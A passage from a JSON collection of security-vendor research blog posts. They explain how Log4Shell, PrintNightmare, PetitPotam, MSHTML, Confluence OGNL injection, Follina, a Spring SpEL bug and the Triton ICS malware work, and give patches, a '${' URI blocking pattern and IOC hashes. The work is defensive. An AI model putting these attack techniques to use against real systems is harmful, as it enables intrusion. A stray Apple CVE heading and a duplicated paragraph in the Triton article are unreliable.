remain a challenge. Perimeter and endpoint security solutions will have to evolve to address those challenges by introducing the innovative inspection and detection techniques alongside applying secure software design and development practices during application development. \n", "cvss3": {}, "published": "2022-07-19T00:00:00", "type": "trellix", "title": "Countering Follina Attack (CVE- 2022-30190) with Trellix Network Security Platform\u2019s Advanced Detection Features", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444", "CVE-2022-30190"], "modified": "2022-07-19T00:00:00", "id": "TRELLIX:D8DB23FAEBC16DCFBC54050BEBBF650D", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/countering-follina-attack-with-network-security-platforms-advanced-detection-features.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-01-24T00:00:00", "description": "# Beyond Memory Corruption Vulnerabilities \u2013 A Security Extinction and Future of Exploitation\n\nBy Chintan Shah \u00b7 January 24, 2022\n\nModern exploitation techniques have changed how adversaries execute their attack strategies and how defenders analyze paths from vulnerability to exploitation. Over the past decade, we have seen rock solid focus on hardening security at both the overall Operating System and applications, which has resulted in remarkable progress being made on introducing several exploit mitigations. This progress has been gradually eliminating entire classes of memory corruption vulnerabilities in some cases. The Use-after-free (UAF) is a class of vulnerabilities, for example, which is very common in large complex code bases such as web browsers. Due to ease of exploitation, Microsoft introduced an isolated heap and delayed free of objects in its browser engine (mshtml.dll), breaking the UAF exploitation chain and making adversaries to address those barriers requiring them to re-engineer the exploits. Figure 1 below shows the part of the code where it was introduced to mitigate UAF vulnerabilities. \n\n **Figure 1 \u2013 mshtml introduction of the isolated heap to raise exploitation bar for UAF exploitation**\n\nWe can notice the different between the protected and unprotected code. While this was just the tip of the iceberg, it made exploiting UAF vulnerabilities extremely challenging since it required the attackers to address specific timing constraints and memory thresholds as well. Figure 2 below is the simple visualization of Windows OS memory exploit mitigations introduced over the past decade or so.\n\n **Figure 2 \u2013 Evolution of Windows OS exploit mitigations**\n\nHowever, time and again, we have seen these exploit mitigations being bypassed within a short period after they were introduced, primarily because either all the code including dependent, and third party code was not compatible with or not compiled with those mitigation switched on in the compiler. This essentially meant that the exploit mitigation was not enforced on every part of the code, or the mitigation itself was not completely implemented, leaving multiple loopholes which in turn could be exploited . For instance, it can be noted from the above visualization that ASLR was not implemented in initially in its entirety but rather in stages, thereby leaving much of the code still vulnerable to bypasses.\n\n##### Memory Corruption vulnerabilities \u2013 Will it become a thing of the past? \n\nWhile memory corruption vulnerabilities continue to be the most widely reported class of bugs , converting them into full-fledged weaponized exploits has become a challenge over the recent years owing to the exploit mitigations introduced at the OS as well as the client side application (For e.g., scripting engines). Translating memory corruption vulnerabilities into full blown exploits leading into arbitrary code execution, requires bypassing multiple mitigations without triggering any endpoint security solution protection or detection. This now means significant invest in effort, time and cost is required by adversaries to research exploit mitigation bypasses. On several occasions, adversaries may also need to chain multiple vulnerabilities to be able execute a working exploit on the target system which also significantly increases the development cost , raising the bar of exploitation.\n\nWe believe that this exploitation mitigations evolution is going to be crucial in shaping the nature of vulnerability classes of interested to adversaries in the future. The question : \u201cWill memory corruption vulnerabilities become extinct ?\u201d is debatable and requires some introspection.\n\n##### Exploitation Strategies of the Future - What lies ahead? \n\nMemory corruption vulnerabilities will continue to exist in the applications as long as there is some code in the application that handles memory incorrectly, but the intensity and frequency of exploitation of this class of vulnerabilities will eventually fade out. We had witnessed multiple instances of exploitation techniques in the past where attackers achieved arbitrary memory Read/Write (R/W),by exploiting a memory corruption flaw and using that primitive to change certain flags or data in the application memory leading to code execution. These set of methods codenamed \u201cdata only attacks\u201d were relatively easier strategies seen in many exploits. Eventually randomizing certain critical data structures locations in memory reduced this nature of attacks over time. \n\nWith feature rich applications, attackers will always be on a lookout for the easier strategies to achieve code execution on the target system. There are always legacy systems around exposed to the internet which will offer the path of least resistance to the attackers since they lack the mitigations introduced. However, one of the ways forward in this direction is to abuse the feature or design flaws in the application or in the network protocol. If adversaries can determine the way to abuse the inherent design or feature of the target application, for instance, making the application or a service connect to the attacker controlled machine without orchestrating the memory explicitly, it becomes relatively easier to achieve remote code execution and at the same time, causing havoc on the target machine since the functionality of the arbitrary code executed by the exploited process is completely on the imagination of the attacker. Figure 3 below is a simplistic view on the progression of exploitation strategies over the last few years. \n\n **Figure 3 \u2013 Adversary exploitation strategy evolution**\n\nWe have witnessed data only attacks and abuse of application features/design flaws several times over the last few years. They offer multiple advantages over the traditional memory corruption exploits, and some of the reasons we believe this is going to be the exploitation strategy of the future are:\n\n * It has the potential to bypass exploit mitigations in place and hence adversaries do not have to engineer the exploit specifically to address those barriers. \n * Arbitrary code is executed with the privileges of the exploited process and hence helps elevate the privileges.\n * Exploits taking advantage of application\u2019s inbuilt feature or design flaws does not have to deal with the explicit memory manipulation and space constraints before the vulnerability is exploited. Consequently, getting rid of injecting the shellcodes in the memory and the older stack pivoting techniques. \n * Relatively easier to exploit with lesser development / maintenance cost and time to weaponize it. \n\nRetrospection of critical vulnerabilities over the last couple of quarters can give us the definite clue on how the future attacks will take shape. In the following sections, we take a look at some of the more recent high impact vulnerabilities and check how features or design flaws in the service or application were abused to achieve code execution or sensitive information leak with minimum resistance.\n\n##### CVE-2021-44228 \u2013 Apache Log4J2 Logging Library Vulnerability Leading to Remote Code Execution\n\nThis RCE vulnerability reported in Apache\u2019s Log4j Logging library is one of the most critical flaws reported in the recent years, allowing attackers to execute arbitrary code on the vulnerable server that uses Log4J logging library to log text messages. [In our previous blog](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/vulnerability-discovery-in-open-source-libraries-part-1-tools-of-the-trade/>), we discussed at great length on how open source softwares serves as the building blocks of modern software development and how critical it is to audit them as any vulnerability will have a significant impact on the product using it. \n\nThe vulnerability lies in the \u201c**Lookup**\u201d method of \u201c**jndimanager**\u201d class. When the JNDI URL is included in the request message parameter to be logged by log4j, the apache\\logging\\log4j\\core\\lookup\\JndiLookup.lookup () method is called with the JNDI URL which in turn calls the net\\JndiManager.lookup () method as shown in figure 3 below, leading to the initiation of the remote JNDI lookup to the attacker controlled server. This allows the attacker controlled server to send the malicious JNDI reference in the response leading to the execution of arbitrary code on the vulnerable server. \n\n **Figure 4 \u2013 JNDI lookup**\n\nThis RCE was made possible because Java implements a variety of JNDI ( Java Naming and Directory Services) service providers like LDAP, DNS, RMI and CORBA; loading remote classes was also possible, depending on the default system properties set.\n\n**CVE-2021-44228** is a classic example of feature exploitation. The feature abused here was the [lookup substitution](<https://logging.apache.org/log4j/2.x/manual/configuration.html#PropertySubstitution>) which supports [Lookups](<https://logging.apache.org/log4j/2.x/manual/lookups.html>). Lookups are way to add values to the log messages which are typically variable names resolved using a defined map or at the runtime via implemented interfaces like [StrSubstitutor](<https://logging.apache.org/log4j/2.x/log4j-core/apidocs/org/apache/logging/log4j/core/lookup/StrSubstitutor.html>) and [StrLookup](<https://logging.apache.org/log4j/2.x/log4j-core/apidocs/org/apache/logging/log4j/core/lookup/StrLookup.html>) classes. \n\nLog4j supports the property syntax \u201c${prefix:name}\u201d where prefix indicates the Log4j that the variable name should be evaluated in the specific context. JNDI context is built into Log4J as shown below.\n\n **Figure 5 \u2013 JNDI context**\n\n **Figure 6- JNDI lookup descripton**\n\nSince JNDI lookups was enabled by default in Log4J version 2.14.1 and prior (see figure 6 above), the library could identify the JNDI references passed as the parameter value in the HTTP request headers logged on the server , consequently allowing attackers to inject malicious JNDI references in the HTTP request parameters leading to remote Java code execution.\n\n##### CVE-2021-34527 \u2013 Windows Print Spooler Service Vulnerability Leading to Remote Code Execution\n\nPrivileged remote code execution vulnerability in spoolsv.exe i.e., PrintNightmare was another critical vulnerability reported last year and serves as good illustration of how a design flaw in the protocol can be abused to execute arbitrary code on the target machine without having to operate on the memory. \n\nThe vulnerability was exploited over Print System Remote Protocol ([MS-RPRN](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1>)) and Print System Asynchronous Remote ([MS-PAR](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/695e3f9a-f83f-479a-82d9-ba260497c2d0>)) protocol, by making RPC calls over SMB. The exploit takes advantage of a classic design flaw in the implementation of the print server component in the spooler service, when RPC requests are made to MS-RPRN and MS-PAR interfaces to install the printer drivers on the target system. Making the RPC call to [RpcAddPrinterDriverEx](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b96cc497-59e5-4510-ab04-5484993b259b>) (MS-RPRN Opnum 89) or [RpcAsyncAddPrinterDriver](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/5d864e3e-5d8b-4337-89ce-cb0258ab97cd>) (MS-PAR Opnum 39) requires a DRIVER_CONTAINER structure to be passed as an argument. \n\n **Figure 7 \u2013 DRIVER_CONTAINER structure**\n\nAs indicated in the above structure details, DRIVER_CONTAINER contains **pDriverPath** and **pConfigFile**, which are the full path of the filename containing the printer driver and configuration module respectively. Both **pDriverPath** and **pConfigFile** are checked for the UNC path to prevent arbitrary code from loading. \n\nThe design or logic flaw in the code here is that same UNC path check is not applied to **pDataFile**, which is the full path of the file containing printer data. An adversary could make multiple calls to **RpcAddPrinterDriverEx** with:\n\n 1. **pDataFile** as the UNC path of the malicious DLL accessible to the target machine which when successful will copy the malicious DLL to the target machine locally.\n 2. Same API with the copied file name assigned to the **pConfigFile** (this time the malicious DLL becomes the local path) , leading to loading of malicious code by print spooler service. \n **Figure 8 \u2013 Adversary calls to driver installation API RpcAddPrinterDriverEx**\n\n##### CVE-2021-36942 \u2013 LSA Spoofing Vulnerability in Windows Leading to Credential Leaks\n\nRPC over SMB had always been on the forefront of many exploitation methods. This vulnerability could be exploited by again abusing [MS-EFSRPC](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31>) protocol, which is used in windows to manage the files on the remote system and encrypted using [Encrypting File System](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/230807ac-20be-494f-86e3-4c8ac23ea584#gt_3bd30c20-9517-4030-a48c-380362e209a1>) ( EFS ). \n\nBy making specific RPC calls like [EfsRpcOpenFileRaw](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31>) over LSARPC interface attacker can make one windows host authenticate to another server; essentially meaning that a target server can be made to authenticate to an adversary controlled server via NTLM authentication. More importantly, LSARPC can be issued using RPC calls without any prior authentication and if this target server is Active Directory (AD), then adversary can make AD connect to the arbitrary server using the machine account for NTLM authentication. This EFSRPC protocol can be abused to chain multiple vulnerabilities within the enterprise network to relay NTLM credentials to an attacker controlled server which could be used to perform lateral movement, eventually leading to complete domain compromise. \n\n **Figure 9 \u2013 Adversary making RPC call to EFSRPC interface**\n\nIf the adversary is controlling an IIS web server with the Active Directory Certificate Services ( AD CS ) feature installed and is configured to use NTLM over HTTP authentication, making an Active Directory authenticate to IIS will result into leaking the NTLM credentials to the adversary, resulting in complete domain compromise. While NTML relay attacks aren\u2019t new, it is recommended to use more secure authentication mechanism like Kerberos to prevent protocol abuse like this.\n\n **Figure 10 \u2013 Authentication providers in IIS web server**\n\nIn summary, being able to abuse a protocol or a feature to make a critical asset connect to an externally owned adversary server comes with a dangerous consequence as demonstrated by the CVE-2021-44228 Log4J vulnerability.\n\n##### CVE-2021-40444 \u2013 Windows MSHTML Vulnerability Leading to Remote Code Execution\n\nThis was yet another critical vulnerability exploited last year and is a great example of how a simple feature abuse can be chained with a logic flaw to achieve arbitrary code execution. First, Object Linking and Embedding (OLE) was used to link the document to the external OLE object. Historically, OLE has played a significant role in building weaponized office exploits and this will continue to happen as it is one of the core features of MS-Office file format designed specifically to address interoperability. \n\n[MS Office Open XML specifications](<https://www.ecma-international.org/publications-and-standards/standards/ecma-376/>) allows a document to embed or link to internal or external objects and in particular link to the external OLE object is specified via relationships . As shown in the crafted exploit document below, the **document.xml.rels** file with **Type** attribute as \u201coleObject\u201d, **Target** attribute set to the OLE object link and **TargetMode** set as external. This allows the crafted document to link to the externally hosted malicious object and invoke the respective protocol / resource handlers for rendering the object, to exploit a potential logic / design flaw in the handler. This is typical OOXML template injection techniques used in many OOXML exploits in the past. We had an in depth look on OLE exploits in our [previous blog post](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/an-inside-look-into-microsoft-rich-text-format-and-ole-exploits/>).\n\n **Figure 11 \u2013 document.xml.rels file in the OOXML document linking to external OLE object**\n\nHTML code processing is done in **mshtml.dll** while HTTP protocol and MSHTML downloads are verified for trust and handled in urlmon.dll. The design flaw in the **urlmon.dll** code was in relation to the extraction and the trust verification of the downloaded CAB file. The CAB file was downloaded via Javascript (JS) code embedded within the **side.html** page as in figure 11 above. Because of the missing path escape checks during the extraction of the CAB file, it allowed the exploit to extract the file contained within the CAB with the relative path per figure 12 below. This resulted into dropping of the malicious payload outside of the created TEMP directory, eventually allowing the dropped payload to be executed.\n\n **Figure 12 \u2013 Vulnerability in CAB file extraction function in urlmon.dll**\n\n##### Conclusion\n\nThere has been a trend in the past few years of vulnerabilities like CVE-2021-44228, CVE-2021-34527, CVE-2021-36942 and CVE-2021-40444 described above which take advantage of inherent processing flaws and are predominantly feature abuse. While memory corruption flaws will continue to proliferate as long as insecure code exists in non-memory safe languages other than Rust, we certainly expect to see the exploitation trend moving more towards exploiting design or logic flaws and protocol abuses. Consumers as well as the developers of open source software need to be more vigilant as these flaws will allow adversaries to achieve their initial system level objective of moving laterally within the network ,without worrying about the defense in depth of recently matured memory exploit mitigations.\n", "cvss3": {}, "published": "2022-01-24T00:00:00", "type": "trellix", "title": "Beyond Memory Corruption Vulnerabilities \u2013 A Security Extinction and Future of Exploitation", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-34527", "CVE-2021-36942", "CVE-2021-40444", "CVE-2021-44228"], "modified": "2022-01-24T00:00:00", "id": "TRELLIX:ED6978182DFD9CD1EA1E539B1EDABE6C", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/beyond-memory-corruption-vulnerabilities.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-07-06T00:00:00", "description": "# The Bug Report \u2013 June 2022 Edition \n\nBy Sam Quinn \u00b7 July 6, 2022\n\n## Your Cybersecurity Comic Relief\n\n \n\n\n### Why am I here?\n\nWhy do all the most critical vulnerabilities always have to come out on holidays? Just like clockwork, CVE-2022-26134 came out over the U.S.\u2019 Memorial Day weekend as most of us were trying to get away from technology for a change. Bugs like this always bring us back early. But enough complaining about ruined vacations\u2014let\u2019s get into the worst coolest bugs of this month! The winners are:\n\n * CVE-2022-26134 - OGNL injection vulnerability in Atlassian Confluence\n * CVE-2022-30190 - Zero Click Microsoft Support Diagnostic Tool Vulnerability: \u201cFollina\u201d\n * CVE-2022-22980 \u2013 SpEL injection via parameter placeholder expressions\n \n\n\n## CVE-2022-26134: ${ return this.JavaVuln++; }\n\n### What is it?\n\nAt its core, CVE-2022-26134 is an unauthenticated command injection directly into a Java interpreter. More specifically this vulnerability is through Java\u2019s Object-Graph Navigation Language (OGNL) Expression Language. While most bugs require lengthy explanations and technical walk-throughs, this vulnerability is easier understood by looking at the exploitation payload first.\n\n \nFigure 1: Demonstration of CVE-2022-26134 using cURL (encoded) \n\n\nFor those that cannot read ASCII hex fluently:\n\n \nFigure 2: Demonstration of CVE-2022-26134 using cURL (decoded to ASCII) \n\n\nSee!? The exploit request is easier than knowing what OGNL is. \n\nBut we must give the nerds like myself some technical satisfaction on how this bug works and why it is so simple. In short, the user supplied URI eventually trickles down to an OGNL expression evaluator which attempts to resolve any variables in the URI, which in turn can be used to execute Java code.\n\nIt is important to also point out that this vulnerability is unauthenticated and will execute with the privileges of the Confluence server\u2026 which is definitely not root, right? \n\n### Who cares?\n\nBecause this is such a simple vulnerability to exploit, there are already a huge number of POCs available on the web. Heck, there is even one in this report. This vulnerability has and will be actively used in the wild and Confluence still uses the arcane method of manual updates (yuck)! So, with many unpatched systems still out in the wild, I expect to see exploit attempts targeting CVE-2022-26134 long into the future.\n\nFrom a quick Shodan search there are about 13k publicly available Confluence servers and with many Confluence users being businesses the impact of this vulnerability is nothing to shake a stick at.\n\n \nFigure 3: Shodan.io search results for Confluence servers \n\n\n### What can I do?\n\nPatching is your best defense and details are available [here](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>). If a full Confluence server update is out of the question, you can manually patch the vulnerable \u201c.jar\u201d files by downloading them [here](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html#migration>) and overwriting them in the Confluence install directory. But please if you are going to be overwriting install files have a backup. If you don\u2019t even know where your confluence server is, flagging/blocking any URI that contains the characters \u201c${\u201c may also prove useful. As a Trellix customer you\u2019re already protected as we already have multiple network signatures baked into our [Network Security platform](<https://www.trellix.com/en-us/platform/network-security.html>).\n\n \n\n\n## CVE-2022-30190: Shoot! There is trouble in Microsoft Office\u2019s troubleshooter\n\n### What is it?\n\nCVE-2022-30190, nicknamed \u201cFollina,\u201d was first discovered out in the wild from an upload to [VirusTotal](<https://www.virustotal.com/>). Through this VirusTotal upload, combined with the Twitter post shown below, the world was made aware of this true zero-day.\n\n \n[Figure 4: MSDT troubleshooter argument command injection](<https://twitter.com/nao_sec/status/1530196847679401984?s=20&t=5zDh7mYs2azLWJ-X55h70g>) \n\n\nBy using Microsoft Word\u2019s remote template functionality, a maliciously crafted document can be used to resolve the \u201cms-mdt:/\u201d portion of the remote URL via Windows custom protocol handler. After it is resolved, the URL is passed directly to Microsoft Support Diagnostic Tool (msdt.exe). The vulnerability lies within the MSDT tool\u2019s \u201cIT-BrowseForFile\u201d argument as is parsed by PowerShell. This means that anything you could normally do via PowerShell could also take place via this bug through the \u201cIT-BrowseForFile\u201d parameter.\n\n### Who cares?\n\nIn short, this vulnerability affects all versions of the Office 365 and has been shown to also work in the standalone Office suites from 2013 all the way through Office 2021, even with macros disabled! It has been determined that Office \u201cprotected view\u201d will prevent the Follina vulnerability unless the document has been converted to a Rich Text Format (RTF) document. So, still be weary of unknown files until you are fully patched.\n\nIt is worth mentioning that this was a true zero-day and active exploitation has been observed in the wild, with many ransomware gangs trying to use this vulnerability for a quick win. Obviously Trellix is actively watching this bug and more information can be found [here](<https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/follina-microsoft-office-zero-day-cve-2022-30190.html>).\n\n### What can I do?\n\nThe best plan of action to protect against this attack in your environment is to apply the official patch released by Microsoft [here](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>). Can't patch? Trellix has your back with protection build into our products! Check out this [knowledge base article](<https://kcm.trellix.com/agent/index?page=content&id=KB95707&locale=en_US>) for more details. Lastly if all else fails following this official workaround will protect against the Follina bug:\n\n 1. Run Command Prompt as Administrator.\n 2. To back up the registry key, execute the command \u201creg export HKEY_CLASSES_ROOT\\ms-msdt filename\u201c\n 3. Execute the command \u201creg delete HKEY_CLASSES_ROOT\\ms-msdt /f\u201d.\n\nThe workaround above will prevent the resolution of any \u201cms-msdt:/\u201d URLs.\n\n## CVE-2022-22980: Spring4shell resurrected?\n\n### What is it?\n\nCVE-2022-22980 is the latest vulnerability in the Spring framework eerily similar to the Spring4Shell vulnerabilities publicly [released early this year](<https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/the-bug-report-april-2022-edition.html#CVE-2022-22965>). This vulnerability, just like Spring4Shell, takes advantage of Spring Expression Language (SpEL) injection to execute code on the remote host. The abused SpEL functions for this vulnerability are through the \u201c@Query\u201d and \u201c@Aggregation-annotated\u201d query methods. These methods are only vulnerable when user supplied data is not sanitized before being bound via query parameter placeholders. For the SpEL lay-persons out there (myself included) the query parameter placeholders are presented this way \u201co.owner.id = ?#{ some-expression }\u201d instead of a static parameter accessed in this manner \u201co.owener.id = [1]\u201d. More details on parameter placeholder expressions can be seen in more detail [here](<https://github.com/spring-projects/spring-data-jpa/issues/955>). So, how is it exploited? you may be wondering? Well, if a placeholder consumes user input directly without sanitization, this bug could be exploited by passing in Java code directly as shown in a POC below.\n\n \n[Figure 5: Proof of concept exploit opening calculator for CVE-2022-22980](<https://github.com/trganda/CVE-2022-22980>) \n\n\n### Who cares?\n\nIf you were affected by the Spring4Shell vulnerabilities earlier this year, then you probably should care about this CVE as well. It seems like finding all the Java machines to patch is starting to become a monthly ritual.\n\nMore specifically if you are running an application that utilizes Spring Data MongoDB V3.4.0 or V3.3.0-V3.3.4, you are likely vulnerable.\n\n### What can I do?\n\nNot to beat a dead horse, but the first step would be to patch to the latest version of Spring Data MongoDB to either 3.4.1+ or 3.3.5+. If patching is not a viable solution in your environment, one could secure themselves by using static parameter references \u201c[1]\u201d instead of the \u201c?1\u201d and sanitizing user-supplied input before the query method. The last mitigation would be to \u201cReconfigure the repository factory bean through a BeanPostProcessor with a limited QueryMethodEvaluationContextProvider\u201c. While the last mitigation was pulled directly from [VMWares security disclosure page](<https://tanzu.vmware.com/security/cve-2022-22980>) and I am sure it will mean something to someone, I do not know what a \u201cfactory bean\u201d is. Sounds tasty though.\n", "cvss3": {}, "published": "2022-07-06T00:00:00", "type": "trellix", "title": "The Bug Report \u2013 June 2022 Edition", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-22965", "CVE-2022-22980", "CVE-2022-26134", "CVE-2022-30190"], "modified": "2022-07-06T00:00:00", "id": "TRELLIX:341471F990B5DC7BFF1C28F924F10E32", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/the-bug-report-june-2022-edition.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-11-08T00:00:00", "description": "# Triton Malware Spearheads Latest Attacks on Industrial Systems | McAfee Blogs\n\nThomas Roccia \u00b7 NOV 08, 2018\n\nMalware that attacks industrial control systems (ICS), such as the [Stuxnet campaign](<https://www.mcafee.com/enterprise/en-us/security-awareness/what-is-stuxnet.html>) in 2010, is a serious threat. This class of cyber sabotage can spy on, disrupt, or destroy systems that manage large-scale industrial processes. An essential danger in this threat is that it moves from mere digital damage to risking human lives. In this post we will review the history of ICS malware, briefly examine how one ICS framework operates, and offer our advice on how to fight such threats.\n\nICS malware is usually sophisticated, requiring time to research its targets and sufficient resources. Attackers can be motivated by financial gain, hacktivism, or espionage, as well as for political ends, as we saw with Stuxnet. Since Stuxnet, researchers have discovered several industrial attacks; each year we seem to read about a worse threat than before.\n\nIn August 2017, a sophisticated malware targeted petrochemical facilities in the Middle East. The malware\u2014dubbed Triton, Trisis, or HatMan\u2014attacked safety instrumented systems (SIS), a critical component that has been designed to protect human life. The system targeted in that case was the Schneider Triconex SIS. The initial vector of infection is still unknown, but it was likely a phishing attack.\n\nAfter gaining remote access, the Triton attackers moved to disrupt, take down, or destroy the industrial process. The goal of the attackers is still unclear because the attack was discovered after an [accidental shutdown](<https://www.darkreading.com/attacks-breaches/triton-attacker-disrupts-ics-operations-while-botching-attempt-to-cause-physical-damage-/d/d-id/1330650>) of the plant led to further investigation. Investigations conducted by several security companies have revealed a complex malware framework embedding PowerPC shellcode (the Triconex architecture) and an implementation of the proprietary communication protocol TriStation. The malware allowed the attackers to easily communicate with safety controllers and remotely manipulate system memory to inject shellcodes; they completely controlled the target. However, because the attack did not succeed it is possible that a payload, the final stage of the attack, was missing. All investigations pointed in this direction. If the final payload had been delivered, the consequences could have been disastrous.\n\n## CVE-2022-22620: Apple finally gave something away for free!\n\nHistory of ICS malware \n\nIn 2010, Stuxnet was one of the most sophisticated ICS threats discovered. This cyber weapon was created to target Iranian centrifuges. It was able to reprogram a particular programmable logic controller to change the speed of centrifuge rotations. The goal of Stuxnet was not to destroy but to take the control of the industrial process.\n\nIn 2013, the malware Havex targeted energy grids, electricity firms, and many others. The attackers collected a large amount of data and remotely monitored industrial systems. Havex was created for espionage and sabotage.\n\nBlackEnergy was discovered in 2015. It targeted critical infrastructure and destroyed files stored on workstations and servers. In Ukraine, 230,000 people were left in the dark for six hours after hackers compromised several power distribution centers.\n\nIn 2015, IronGate was discovered on public sources. It targeted Siemens control systems and had functionalities similar to Stuxnet\u2019s. It is unclear if this was a proof of concept or a simple penetration-testing tool.\n\nIndustroyer hit Ukraine again in 2016. The malware embedded a data wiper component as well as a distributed denial of services module. It was crafted for destruction. The attack caused a second shutdown of Ukraine\u2019s power grid.\n\nIn 2017, Triton was discovered. The attack did not succeed; the consequences could have been disastrous.\n\n\n\nICS malware are critical because they infect industrial devices and automation. However, regular malware can also impact industrial process. Last year WannaCry forced several companies, from medical to automobile industries, to stop production. Some months later NotPetya hit nuclear power plants, power grids, and health care systems. In 2018, a cryptocurrency miner struck a water utility in Europe.\n\nFacing widespread risks, critical infrastructures need a specific approach to stay safe.\n\nICS malware are critical because they infect industrial devices and automation. However, regular malware can also impact industrial process. Last year WannaCry forced several companies, from medical to automobile industries, to stop production. Some months later NotPetya hit nuclear power plants, power grids, and health care systems. In 2018, a cryptocurrency miner struck a water utility in Europe.\n\n### Triton framework\n\nTriton targeted the Triconex safety controller, distributed by Schneider Electric. Triconex safety controllers are used in 18,000 plants (nuclear, oil and gas refineries, chemical plants, etc.), according to the company. Attacks on SIS require a high level of process comprehension (by analyzing acquired documents, diagrams, device configurations, and network traffic). SIS are the last protection against a physical incident.\n\nThe attackers gained access to the network probably via spear phishing, according to an investigation. After the initial infection, the attackers moved onto the main network to reach the ICS network and target SIS controllers.\n\n\n\nTo communicate with SIS controllers, attackers recoded the proprietary TriStation communication protocol on port UDP/1502. This step suggests they invested the time to reverse engineer the Triconex product.\n\nNozomi Networks has created a [Wireshark dissector](<https://github.com/NozomiNetworks/tricotools>) that is very handy for analyzing the TriStation protocol and detecting a Triton attack. The following screenshot shows an example of the information returned by the Triconex SIS. Triton requires the \u201crunning state\u201d of the controller to perform the next stages of the attack.\n\n\n\nIn the preceding screen Triconex replies to the request \u201cGet Control Program Status,\u201d which is sent by Triton.\n\nThe Triton framework (dc81f383624955e0c0441734f9f1dabfe03f373c) posed as the legitimate executable trilog.exe, which collects logs. The executable is a python script compiled in an exe. The framework also contains library.zip (1dd89871c4f8eca7a42642bf4c5ec2aa7688fd5c), which contains all the python scripts required by Triton. Finally, two PowerPC shellcodes (the target architecture) are used to compromise the controllers. The first PowerPC shellcode is an injector (inject.bin, f403292f6cb315c84f84f6c51490e2e8cd03c686) used to inject the second stage (imain.bin, b47ad4840089247b058121e95732beb82e6311d0), the backdoor that allows read, write, and execute access on the Triconex product.\n\nThe following schema shows the main modules of Triton:\n\n\n\nThe missing payload has not been recovered during the forensic investigation. Because the attack was discovered early, it is possible that the attackers did not have time to launch the final stage.\n\n### How to detect an unusual network connection\n\n[Nozomi Networks has created a script](<https://github.com/NozomiNetworks/tricotools>) that simulates a Triconex safety controller. We modified this script with a Raspberry Pi to create a cheap detector tool.\n\n&lt;br /&gt;\n\nThis inexpensive tool can be easily installed on an ICS network. If an illegitimate connection occurs, the device alerts with a blinking LED and siren. It also displays the IP address of the connection for further investigation.\n\nThe following picture shows how to connect the LED and buzzer.\n\n\n\n### Fighting ICS malware\n\nICS malware has become more aggressive and sophisticated. Many industrial devices were built before anyone imagined cyberattacks such as Triton. ICS\u2019s are now exposed to connected environments they were not designed for.\n\nStandard McAfee security recommendations (vulnerability patching, complex passwords, identification control, security tools, etc.) remain the same as for regular networks, yet industrial systems also require specific procedures due to their importance. Industrial networks must be segregated from general business networks, and every machine connected to the industrial process should be carefully monitored by using strict access control and application whitelisting.\n\nFurther security recommendations:\n\n * Segregate physical and logical access to ICS networks with strong authentication, including strong passwords and double factor, card readers, surveillance cameras, etc.\n * Use DMZ and firewall to prevent network traffic from passing between the corporate and the ICS network\n * Deploy strong security measures on the ICS network perimeter, including patch management, disabling unused ports, and restricting ICS user privileges\n * Log and monitor every action on the ICS network to quickly identify a point of failure\n * When possible implement redundancy on critical devices to avoid major issues\n * Develop strong security policies and an incident response plan to restore systems during an incident\n * Train people with simulated incident responses and security awareness\n\nAttackers learn what works from past attacks and from each other. Rapid developments in ICS threats make it crucial to stay protected. Manufacturers, plant operators, governments, and the cybersecurity industry must work together to avoid critical cyberattacks.\n\n### Indicators of compromise\n\n * dc81f383624955e0c0441734f9f1dabfe03f373c: trilog.exe\n * b47ad4840089247b058121e95732beb82e6311d0: imain.bin\n * f403292f6cb315c84f84f6c51490e2e8cd03c686: inject.bin\n * 91bad86388c68f34d9a2db644f7a1e6ffd58a449: script_test.py\n * 1dd89871c4f8eca7a42642bf4c5ec2aa7688fd5c: library.zip\n * 97e785e92b416638c3a584ffbfce9f8f0434a5fd: TS_cnames.pyc\n * d6e997a4b6a54d1aeedb646731f3b0893aee4b82: TsBase.pyc\n * 66d39af5d61507cf7ea29e4b213f8d7dc9598bed: TsHi.pyc\n * a6357a8792e68b05690a9736bc3051cba4b43227: TsLow.pyc\n * 2262362200aa28b0eead1348cb6fda3b6c83ae01: crc.pyc\n * 9059bba0d640e7eeeb34099711ff960e8fbae655: repr.pyc\n * 6c09fec42e77054ee558ec352a7cd7bd5c5ba1b0: select.pyc\n * 25dd6785b941ffe6085dd5b4dbded37e1077e222: sh.pyc\n\n### References\n\n * [https://blog.schneider-electric.com/cyber-security/2018/08/07/one-year-after-triton-building-ongoing-industry-wide-cyber-resilience/](<https://ics-cert.us-cert.gov/sites/default/files/ICSJWG-Archive/QNL_DEC_17/Waterfall_top-20-attacks-article-d2%20-%20Article_S508NC.pdf>)\n * [https://www.youtube.com/watch?v=f09E75bWvkk](<https://ics-cert.us-cert.gov/sites/default/files/ICSJWG-Archive/QNL_DEC_17/Waterfall_top-20-attacks-article-d2%20-%20Article_S508NC.pdf>)\n * 